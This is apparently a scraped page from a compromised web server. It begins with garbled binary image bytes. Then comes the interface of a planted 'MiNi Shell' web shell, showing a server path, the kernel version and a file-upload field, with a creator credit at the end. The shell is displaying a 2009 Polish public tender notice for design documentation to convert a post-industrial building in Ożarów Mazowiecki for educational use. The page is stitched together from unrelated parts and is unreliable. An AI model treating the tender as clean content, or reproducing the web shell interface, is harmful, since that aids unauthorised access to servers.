JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090130/13068-N-2009.html

<p class="kh_header"><b>Ożarów Mazowiecki: WYKONANIE WIELOBRANŻOWEJ DOKUMENTACJI  PROJEKTOWEJ PRZEBUDOWY I ADAPTACJI BUDYNKU POPRZEMYSŁOWEGO WRAZ Z PRZYLEGAJĄCYM TERENEM, ZLOKALIZO- WANEGO NA TERENIE STAROSTWA POWIATU WARSZAWSKIEGO ZACHODNIEGO W OŻAROWIE MAZOWIECKIM PRZY UL. POZNAŃSKIEJ 129/133, DZIAŁKA EWIDENCYJNA NR 224, OBRĘB OŻARÓW,  NA CELE EDUKACYJNE I OŚWIATOWE, OBEJMUJĄCEJ  NASTEPUJĄCE ETAPY  REALIZACYJNE:
- ETAP I        -  powierzchnia użytkowa ok. 3500 m2 
- ETAP II      -  powierzchnia użytkowa ok. 120 m2 
-ETAP III     -  powierzchnia użytkowa ok. 1170 m2 .
 W OPARCIU O ISTNIEJĄCĄ KONCEPCJĘ ARCHITEKTONICZNĄ</b><br>
<b>Numer ogłoszenia: 13068 - 2009; data zamieszczenia: 30.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatu Warszawskiego Zachodniego , ul. Poznańska 129/133, 05-850 Ożarów Mazowiecki, woj. mazowieckie, tel. 022 7337212, faks 022 7337212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE WIELOBRANŻOWEJ DOKUMENTACJI  PROJEKTOWEJ PRZEBUDOWY I ADAPTACJI BUDYNKU POPRZEMYSŁOWEGO WRAZ Z PRZYLEGAJĄCYM TERENEM, ZLOKALIZO- WANEGO NA TERENIE STAROSTWA POWIATU WARSZAWSKIEGO ZACHODNIEGO W OŻAROWIE MAZOWIECKIM PRZY UL. POZNAŃSKIEJ 129/133, DZIAŁKA EWIDENCYJNA NR 224, OBRĘB OŻARÓW,  NA CELE EDUKACYJNE I OŚWIATOWE, OBEJMUJĄCEJ  NASTEPUJĄCE ETAPY  REALIZACYJNE:
- ETAP I        -  powierzchnia użytkowa ok. 3500 m2 
- ETAP II      -  powierzchnia użytkowa ok. 120 m2 
-ETAP III     -  powierzchnia użytkowa ok. 1170 m2 .
 W OPARCIU O ISTNIEJĄCĄ KONCEPCJĘ ARCHITEKTONICZNĄ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dla potrzeb Starostwa Powiatu Warszawskiego Zachodniego:
1. Kompletnej wielobranżowej dokumentacji projektowej przebudowy i adaptacji budynku poprzemysłowego wraz  z przylegającym terenem, na cele edukacyjne i oświatowe w oparciu o istniejącą koncepcję architektoniczną. 
2. Dokonanie wymaganych prawem uzgodnień dokumentacji.
3. Wykonanie kosztorysów inwestorskich i ksiąg obmiarów.
4. Przygotowanie niezbędnej dokumentacji do złożenia wniosku  o dofinansowanie inwestycji ze środków Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013, Priorytet VII - Tworzenie i poprawa warunków dla rozwoju kapitału ludzkiego, działanie 7.2 Infrastruktura służąca edukacji, w szczególności:
   -  zbiorczego zestawienia kosztów,
   -  głównego rodzaju robót,
   -  podstawowych przekrojów i rzutów,
   -  proponowanego harmonogramu robót.
 
 Nie dopuszcza się ofert częściowych.

 Nie dopuszcza się ofert wariantowych.

Termin wykonania robót :
  - dokumenty konieczne do złożenia wniosku o dofinansowanie - 31 marca 2009r.
  - całość dokumentacji -  4 miesiące od daty podpisania umowy...</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 72.22.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium wymagane w wysokości 15.000,00 PLN. 
Wadium nie wnosi się przy składaniu wniosków o zaproszenie do udziału w postępowaniu. Do wniesienia wadium zobowiązani będą jedynie wykonawcy, którzy zostaną zaproszeni do udziału w postępowaniu i złożą oferty.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do udziału w postępowaniu dopuszcza się wykonawców, którzy: 
1.Nie podlegają wykluczeniu na podstawie art.; 24 ust.1 i 2 ustawy pzp.
2.Dysponują pracownikami, którzy zgodnie z wymogami art. 12 ustawy z dnia 7 lipca 1994r., Prawo budowlane (t.j. Dz.U. z 2006r., nr 156, poz. 1118  z późn. zm.) mają uprawnienia do projektowania w specjalności architektonicznej, konstrukcyjno-budowlanej i instalacyjnej oraz posiadają aktualne zaświadczenie o ich przynależności do właściwej izby samorządu zawodowego (wydanych przez izbę).
3.Zrealizowali (rozpoczęli i zakończyli) w ciągu ostatnich pięciu latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzy zadania o podobnej charakterystyce. 
4.Spełnienie tego warunku zamawiający będzie oceniał na podstawie załączonego do wniosku wykazu i przedłożonych dokumentów potwierdzających, że roboty te były wykonane należycie.
5.Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
6.Ocena spełnienia warunków wymaganych przez wykonawców zostanie dokonana wg formuły spełnia / nie spełnia w oparciu o informacje zawarte  w dokumentach niżej wymienionych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Podpisane oświadczenie o spełnianie przez wykonawcę warunków udziału w postępowaniu wynikających z art. 22 ust. 1 ustawy pzp tj. :
a)posiada uprawnienia do wykonywania działalności w zakresie objętym zamówieniem,
b)posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym oraz pracownikami zdolnymi do wykonania zamówienia,
c)znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podlega wykluczeniu z postępowania o udzieleniu zamówienia.
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed terminem składania wniosku.
3.Pełnomocnictwo, w którym wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum) ustanawiają pełnomocnika. Winno ono określać w szczególności:
a)przedmiot postępowania, którego dotyczy,
b)wszystkich wykonawców wspólnie ubiegających się o zamówienie,
c)wykonawcę-pełnomocnika,
d)zakres umocowania pełnomocnika,
e)zakres odpowiedzialności za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy zgodny z art. 141 ustawy pzp.
Pełnomocnictwo musi być podpisane przez wszystkich uczestników konsorcjum (łącznie z pełnomocnikiem) według zasad reprezentacji właściwych dla każdego z wykonawców. Każdy z wykonawców tworzący konsorcjum oddzielnie musi wykazać, iż nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt 1-9 i ust. 2 pkt 1 ustawy pzp poprzez złożenie dokumentów w punkcie 1 i 2. W odniesieniu do wymagań wynikających z art. 22 ust. 1 pkt 1-3 ustawy pzp ( tj. posiadania posiadanych uprawnień, wiedzy i doświadczenia, potencjału kadrowego ) i pozostałych wymagań określonych w ogłoszeniu wnioski składane przez konsorcjum zostaną ocenione pod kątem łącznego spełniania wymagań zamawiającego przez występujących wspólnie wykonawców, na podstawie złożonych przez nich dokumentów ( jeśli dotyczy wykonawcy ).
4.Uprawnienia budowlane pracowników którymi dysponuje wykonawca, odpowiadające wymogom ustawy Prawo budowlane oraz stosowne aktualne zaświadczenia o ich przynależności właściwej izby samorządu zawodowego (wydanego przez izbę)
5.Wykaz zrealizowanych przez wykonawcę w ostatnich 5 latach przed upływem terminu składania wniosku, zadań odpowiadających rodzajem przedmiotowi zamówienia, zawierający :
a)określenie zadania,
b)miejsce wykonania,
c)podmiot zlecający zadanie,
d)wartość zadania,
e)okres jego wykonania,
f)datę zakończenia realizacji zadania,
g)dokumenty potwierdzające należyte wykonanie w.w. zadań (referencje lub protokoły odbioru końcowego).
Wykonawca musi wykazać, że zrealizował w ostatnich 5 latach, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, co najmniej 3 zadania inwestycyjne o podobnej charakterystyce. 
Spełnienie tego warunku zamawiający będzie oceniał na podstawie załączonego do wniosku wykazu i przedłożonych dokumentów, że roboty te były wykonane należycie. Ocena poziomu spełniania przez wykonawcę niniejszego warunku będzie elementem oceny wniosku, służącej do wyboru grupy wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu, jeżeli liczba złożonych wniosków będzie większa niż 5. Punkty za poziom spełniania tego warunku przyznawane będą wg wzoru: Wb/Wn x 100 = Pkt, gdzie Wb- ilość zadań we wniosku badanym (potwierdzonym referencjami lub protokołami odbioru końcowego), Wn- zadania we wniosku zawierającym ich największą ilość (potwierdzonym referencjami lub protokołami odbioru końcowego). 
6. Zaświadczenie właściwego naczelnika urzędu skarbowego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed terminem składania wniosków.
7. Zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzające, żę wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed terminem składania wniosków.
8. Polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
10. Wniosek o dopuszczenie do udziału w postępowaniu oraz załączniki do wniosku sporządzone przez wykonawcę, muszą być podpisane przez osobę lub osoby uprawnione do występowania w obrocie prawnym w imieniu wykonawcy, zgodnie z zasadami reprezentacji określonymi w dokumencie rejestrowym, bądź osoby upoważnione, posiadające stosowne pełnomocnictwo (w tym przypadku oryginał upoważnienia do podpisania dokumentów lub jego notarialnie potwierdzona za zgodność z oryginałem kopia, musi być dołączony do wniosku). Miejsca naniesienia poprawek treści wniosków lub załączników muszą być parafowane przez osobę lub osoby upoważnione (uprawnione). Złożenie przez wykonawcę wraz z wnioskiem kompletu dokumentów i oświadczeń wymienionych w niniejszym ogłoszeniu, będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. 
11. Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału  w postępowaniu i złożenia ofert - 5..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.pwz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> bip pwz.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2009 godzina 11:00, miejsce: Punkt Informacyjny Starostwa Powiatu Warszawskiego Zachodniego, ul. Poznańska 129/133; 05-850 Ożarów Mazowiecki..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com